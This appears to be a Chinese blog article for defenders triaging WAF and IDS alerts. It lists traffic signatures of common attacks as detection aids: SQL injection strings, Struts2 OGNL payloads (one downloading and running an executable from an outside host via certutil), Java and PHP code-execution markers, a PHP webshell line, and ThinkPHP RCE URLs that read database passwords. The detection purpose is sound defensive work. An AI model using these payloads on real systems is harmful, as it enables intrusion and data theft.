声明:公众号大部分文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载,如需转载,请联系公众号管理员授权转载白名单!
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!
START
0x01前言
由于近几年信息安全人员紧缺,面临HW急需安全人员的竞赛中,许多安全厂商降低招聘要求,招收大量安全工作经验较少的人员参与HW当中,由于缺乏相应的工作经验,面对攻击团队的频繁入侵,导致误判、错封攻击源IP地址,进而对公司业务造成严重影响。小编对此对攻击流特征进行了一个详细的总结,本文适用于可查看攻击数据流量的设备,如:waf、ids、ips、天眼、睿眼以及其他全流量分析系统等。
0x02期望效果
看完本文后,您能学到:
>常见告警攻击特征识别
> 低危告警攻击事件忽略
> 研判告警攻击是否误报
> 复杂告警攻击Pcap取证
> 验证告警攻击是否成功
0x03通用攻击关键特征
在设备上产生的告警,就目前而言,基本都有这几个必要字段:请求头、响应码、响应头、载荷、原始数据包。通过这些字段我们可以进行事件的研判,但是就我个人而言,不必执着于告警名称,如果这些字段中包含了一些通用的攻击特征,那么我可判断为是真实攻击,然后再进行下一步确定是否是自己人员进行安全测试,是否需要溯源等下一步的工作计划,通用特征包含但不限于以下这些:
代码语言:javascript复制
代码语言:javascript复制/etc/passwd/etc/shadow/
c:boot.ini/
C:/Windows/system.ini、/windows/win.ini
../../../../../ 若是只有一个且后面是图片类型 pdf类型那需结合其他事件进行综合判断
cmd.exe /c[/k]、系统命令
/bin/bash
wget http://xx.xx.xx.xx/xx.sh
CHR(68)||CHR(113)||CHR(90)||CHR(85)%
print(md5(31337))
执行命令的函数等。
代码语言:javascript复制
0x04SQL注入攻击特征
常见安全漏洞对应攻击特征——SQL注入包含但不限于以下这些:
代码语言:javascript复制
代码语言:javascript复制> select * from xx union select null,null
> order by 10[5][2][3]
> ") or ("1"="1
>‘and 1=2-- -[#]、 1') AnD 1419=1419 AnD ('1419'='1420
> 1' AND ROW(4622,4623)>(SELECT COUNT(*),CONCAT('PGC2UcNo',(SELECT (CASE WHEN (4622=4622) THEN 1 ELSE 0 END)),'PGC2UcNo',FLOOR(RAND(0)*2))x FROM (SELECT 4624 UNION SELECT 4625 UNION SELECT 4626 UNION SELECT 4627)a GROUP BY x) AND 'PGC2UcNo'='PGC2UcNo
> =@`'` Union select userid from `#@__admin` where 1 or id=@`’`
> 9997') AND 8553=8553 AND ('PVZl'='PVZl,1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(113)||CHR(90)||CHR(85),5) FROM DUAL
> sleep(5)、waitfor delay '0:0:5'
> and if (ascii(substr(database(),1,1))、and if (length(database()) (updatexml(1,md5(0x666F7274657374),1)))、extractvalue、NAME_CONST
代码语言:javascript复制
0x05Strusts2远程代码执行攻击特征
常见安全漏洞对应攻击特征——struts2远程代码执行包含但不限于以下这些:
代码语言:javascript复制
代码语言:javascript复制> #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#res.print('RTbZWnwBUdlseupNYQjf'),#res.flush(),#res.close()
> /?redirect:${#w=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),#w.println('SgEyRprkLcMdtnsTJCve'),#w.flush(),#w.close()}
> class.classLoader.resources.dirContext.aliases=/eCJivkuR=conf/
> Content-Type: %{(#nike='multipart/form-data').
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).
(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).
(#cmd='cmd.exe /c certutil.exe -urlcache -split -f http://wiu.fxxxxxxk.me/download.exe %SystemRoot%/Temp/aodagutnzwrjrlm15341.exe & cmd.exe /c %SystemRoot%/Temp/aodagutnzwrjrlm15341.exe').
(#iswin=(@java.lang.System@getProperty('os.name').
toLowerCase().contains('win'))).
(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{
代码语言:javascript复制
0x06java代码执行攻击特征
常见安全漏洞对应攻击特征——Java代码执行包含但不限于以下这些:
代码语言:javascript复制
代码语言:javascript复制 @ognl.OgnlContext
new java.lang.ProcessBuilder
println(
(java.lang.Runtime).getRuntime().exec(new java.lang.String、${new java.lang.Integer( import java.util.*;import java.io java.io.PrintWriter
org.apache.commons.collections.functors.InvokerTransformer
代码语言:javascript复制
0x07PHP远程代码执行攻击特征
常见安全漏洞对应攻击特征——PHP代码执行包含但不限于以下这些:
代码语言:javascript复制
代码语言:javascript复制<?php eval($_POST[xxx])?>
eval()
assert()
preg_replace()
create_function()
call_user_func()
array_map()
call_user_func_array()
phpinfo()
system
exec
popen
passthru
shell_exec
file_put_contents
代码语言:javascript复制
0x08Thinkphp远程代码执行攻击特征
Think PHP远程代码执行漏洞包含但不限于以下这些:
代码语言:javascript复制
代码语言:javascript复制index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=base64_decode&vars[1][]=MWVVdGJrc2pLZ3AyRmx1Zg==
"_method": "__construct", "filter[]": "system", "method": "get", "get[]": 'php -r "phpinfo();“’
/index.php?s=/index/\think\app/invokefunction
/index.php?s=/index/\think\request/cache
?s=index/\thinkRequest/input/index.php
/?s=index/\think\View/display&content=">&data=1
?s=index/\thinkmodule/action/param1/${@phpinfo()}/
index.php?s=index/thinkconfig/get&name=database.passwordindex.php
?s=index/thinkconfig/get&name=database.password c=exec&f=calc.exe&_method=filter
代码语言:javascript复制